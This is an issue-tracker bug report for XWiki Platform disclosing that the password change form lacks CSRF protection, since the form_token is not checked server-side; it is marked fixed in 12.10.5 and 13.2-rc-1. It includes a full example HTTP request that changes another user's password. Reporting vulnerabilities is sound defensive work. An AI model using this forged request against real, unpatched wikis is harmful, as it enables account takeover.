Uploaded image for project: 'XWiki Platform'
  1. XWiki Platform
  2. XWIKI-18315

No CSRF protection on the password change form

    XMLWordPrintable

    Details

    • Type: Bug
    • Status: Closed
    • Priority: Major
    • Resolution: Fixed
    • Affects Version/s: 1.3 M2
    • Fix Version/s: 12.10.5, 13.2-rc-1
    • Component/s: None
    • Labels:
    • Difficulty:
      Easy
    • Documentation:
      N/A
    • Documentation in Release Notes:
      N/A
    • Similar issues:

      Description

      There is no protection against CSRF type attacks on the password change form. The form_token parameter is not checked on the server side. It is possible to create a request without this parameter, and the password will be changed.

      It is therefore very easy, under the condition of tricking an administrator, to be able to change the password of any user of the Wiki.

      Here is an example of a query that allows you to change a password (user toto) on the current stable version of XWiki (POST and GET methods are possible):

       

      GET /xwiki/bin/view/XWiki/toto?xpage=passwd&xwikipassword=aaaaaaaa&xwikipassword2=aaaaaaaa HTTP/1.1
      Host: 127.0.0.1:8080
      User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8
      Accept-Language: en-GB,en;q=0.5
      Accept-Encoding: gzip, deflate
      Origin: http://127.0.0.1:8080
      Connection: close
      Referer: http://127.0.0.1:8080/xwiki/bin/view/XWiki/toto?xpage=passwd
      Cookie: JSESSIONID=1AC1B58E461B85FBE5E1C980197C5A64; username="XXX"; password="XXX"; rememberme="false"; validation="XXX"

       

        Attachments

          Issue Links

            Activity

              People

              Assignee:
              surli Simon Urli
              Reporter:
              Ventresca Pierrick Vuillemin
              Votes:
              0 Vote for this issue
              Watchers:
              2 Start watching this issue

                Dates

                Created:
                Updated:
                Resolved:
                Date of First Response: